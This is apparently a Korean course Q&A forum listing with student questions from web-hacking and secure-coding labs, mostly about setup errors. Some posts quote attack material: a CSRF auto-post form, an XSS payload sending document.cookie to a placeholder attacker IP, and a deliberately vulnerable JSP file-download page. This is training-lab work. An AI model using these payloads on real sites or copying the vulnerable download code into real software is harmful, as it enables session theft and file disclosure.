묻고 답해요
161만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
취약환경 구축 not found 에러?
mysql 로그인도 했고 query.txt 복사해서 붙여넣기도 잘 했는데 '127.0.0.1/insercure_website' 접속시 저런 오류가 납니다. 어디 문제일까요? 질문 내역 중 저랑 같은오류가 생긴 분이 질문하신거 답변 확인해봤는데도 잘 해결이 안됩니다.!
-
미해결AWS 클라우드 서비스 인프라 구축 이해와 해킹, 보안
워드프레스 접속이안됩니다.
기존에 촬영 영상은 22년 기준이어현재기준 도커컴포스 설치 방법찾아보니워드프레스 접속포트가 -80:80 형식이더군요이미지와 같이 설치하고 docker ps 명령에도정상 ps 출력되고있습니다.다만 저렇게 설정하고 워드프레스 접속시개방주소법의 퍼블릭IP:80 해도 접속이안되며localhost:80 해도 접속이안됩니다.접속안될때 문구는 localhost 에서 연결을 거부했습니다 라고 나옵니다.접속이왜 안되는지 문의드립니다.(영상이 22년 화면 기준이라 현재랑 너무 다른설정이 많아 따라가는데 불편합니다)
-
미해결AWS 클라우드 서비스 인프라 구축 이해와 해킹, 보안
Ip가안나와요
Ec2 설치하고 접속후 ip addr 하면 ip가 보여야되는데 안나옵니다.어떻게해야할까요
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
mysql 접속 에러
mysql 접속이 계속 오류가 납니다. 비밀번호 'apmsetup'으로 계속 시도해도 오류가 납니다ㅠㅠ구글링해서 나온 방법들도 안 통해서 질문 남깁니다.. !
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
test' 부분이 실행되지않습니다.
이렇게 off로 바꾸고 재실행 하려고 apacheMonitor를 키려고하는데 이렇게 뜹니다! 그리고 test' 라고 나오는게 아니라 test\' 라고 나옵니다..
-
미해결리눅스 커널 해킹. A부터 Z까지
Stack based BOF 강의에서 질문입니다.
이 강의 전의 기존 ROP방식에서는카나리 다음에 레지스터값들이 저장안되었는데 이번에는 왜 저장될까요?또 위 사진 rop[i++] 14, 15번째(swapgs_restore... 바로 밑)는 왜 0x41414141로 될까요?이것도 저번 강의랑 조금 달라 질문드립니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
monitor 이 안 켜져요
계속 이 메세지만 뜨고 모니터가 열리지 않습니다
-
해결됨반드시 알고 넘어가야 할 웹 기술 기초편
자원을 지정하는 url 13:00
이 url에서 왜 첫 번째 &가 파라미터 값 대입인가요? =가 파라미터 값 대입 아닌가요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글 설치 저장소 위치
한글 깨짐을 위해nano /etc/apt/sources.list 에서deb http://httpredir.debian.org/debian jessie main non-free contrib 를작성했지만 다음과 같은 오류가 발생합니다.같은 질문을 하신 다른 분에 적힌 답변을 참고해보니강의해주신 때와 시간이 달라 다른 저장소 위치를 작성해야한다는 글을 보았습니다.어떤 저장소를 작성해야하는지 알 수 있을까요??
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Rule update 문제
Rule update를 하면 Rules tarball download of emerging.rules.tar.gz....이런 문구만 계속 뜨네요인터넷은 연결되어 있는데 왜 안되는걸까요
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Snorby 설치
securityonion에서 Snorby 설치할려고 github 입력해도 timeout 뜨면서 설치가 안되네요..
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Marketplace에 beta portScanner가 없습니다.
zap 2.16버전을 다운받았는데 marketpalce에 portscanner, Active scanner rules(alpha) 가 없습니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
인터넷 연결문제
칼리리눅스 ping: connect: Network is unreachablenat 네트워크 설정 다 했는데도 이렇게 뜨네요 정말 모르겠습니다. 할 수 있는건 다 해봤습니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?
sql injection 공격이 가능하다면union 공격이 제일 효과적이라는 생각이 들었습니다.sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?blind_Based가 유효한 더 실전적인 케이스가 궁금합니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
리피터 글자가 깨짐현상
리피터로 옮기고 send하면 강사님처럼 문구가 안뜨고 ㅁㅁㅁㅁㅁ ㅁㅁㅁㅁ ㅁㅁㅁㅁ 이렇게 뜹니다 무엇이 원인일련지요,, 환경은 버프스위트 내에 오픈브라우저로 접속했습니다 감사합니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
basic pentesting 2.ova IP설정
basic pentesting 2.ova 다운로드 받았는데, IP설정이 안되어 있습니다.IP설정하는 방법 안내 부탁드립니다.아니면, DHCP 설정되어 있는 ova파일 제공 부탁 드립니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
http://127.0.0.1/insecure_website/index.php 접속 에러 문제
이런 warning 에러 문구가 뜹니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습6-1] CSRF공격을 통한 게시글 무단작성에서 오류가 발생합니다.
<form action="http://172.30.1.22/insecure_website/action.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="title" value="해커가 무단으로 작성!"><input type="hidden" name="password" value="test"><input type="hidden" name="content" value="해커닷"><input type="hidden" name="mode" value="write"><input type="submit"></form>이내용으로 게시글을 작성하면다음과 같이 나옵니다.actio.php에서 뭘 수정해야 할까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
세션 하이재킹 질문
127.0.0.1/session/session.php?session=test이것으로 rawdata.txt에날짜와 시간/ip주소/test는 잘 출력이 되었습니다.다른 웹브라우저에서 공격자id로 접속해서 다음과 같이 게시판을 작성하였으며 그때 ip주소를 어떻게 할당받는지가 궁금합니다.<script>location.href = "http://공격자ip/session/session.php?session=" + document.cookie</script>이 게시판의 내용은 rawdata.txt에 저장되지 않습니다.무엇이 잘못되었을까요?
-
해결됨모의해킹 실무자가 알려주는, 파일 다운로드 취약점 공격 기법과 실무 사례 분석
JasperException
안녕하세요, 코드를 실행시켰을 때 JasperException 오류가 발생하여 문의드립니다. 구글링 했을 때는 jsp 파일이 java로 변환되고 class 생성하는 과정에서 오류가 난다고 합니다. 그래서 WAS에서 오류를 해결할 수 있다고 하는데, 윈도우즈 환경에서 WAS를 어떻게 접근할 수 있는지 모르겠습니다.또한, WAS 말고도 다른 방법이 있는지 궁금합니다.제 코드와 오류를 첨부하겠습니다.감사합니다.<%@ page contentType="text/html; charset=UTF-8"%> <%@ page import="java.util.*;, java.io.*;" %> <% FileInputStream fis = null; <!-- fileInputStream은 1byte씩 부르게 됨 --> BufferedInputStream bis = null; <!-- 그래서 버퍼드 클래스를 사용하면 버퍼를 이용해서 바이트스트림을 쌓아두고 효율적으로 관리 가능능--> BufferedOutputStream bos = null; String path = "C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\webapps\\ROOT\\upload\\image\\"; String org_filename = request.getParameter("org_filename"); <!-- get 메소드를 받아오는 게 아님. 그냥 입력값을 받는 것.--> String real_filename = request.getParameter("real_filename"); if(org_filename = null || real_filename = null) { out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1)</script>"); return; } try { File fd = new File(path + real_filename); if(!fd.exists()) { <!-- 파일이 없으면 --> out.println("<script>alert('파일이 존재하지 않았습니다.');history.back(-1)</script>"); return; } response.setHeader("Content-Type", "application/octect-stream"); <!-- 임의의 파일 --> response.setHeader("Content-Disposition", "attachment; filename=" + org_filename); <!-- 다운받을 때 셋팅되는 파일 이름--> <!-- 파일 -> Byte -> Buffer -> user --> fis = new FileInputStream(fd); <!-- 파일 객체가 들어와도 ㄱㅊ--> bis = new BufferedInputStream(fis); bos = new BufferedOutputStream(response.getOutputStream); byte[] buffer = new byte[1024]; int i = 0; <!-- bis에 있는 값을 buffer로 불러왔는데, 이제 옮길게 없다면 -1이 반환됨 --> while((i=(bis.read(buffer))) != -1) { bos.write(buffer, 0, i); } bos.flush(); } finally { <!-- 객체를 중지시키는 곳--> if(fis != null) <!-- 객체 생성이 제대로 되었다면--> fis.close(); if(bis != null) bis.close(); if(bos != null) bos.close(); } %>오류타입 예외 보고 메시지 org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp 설명 서버가, 해당 요청을 충족시키지 못하게 하는 예기치 않은 조건을 맞닥뜨렸습니다. 예외 org.apache.jasper.JasperException: org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:589) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:425) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:197) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:129) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:58) org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:192) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 비고 근본 원인(root cause)의 풀 스택 트레이스를, 서버 로그들에서 확인할 수 있습니다.
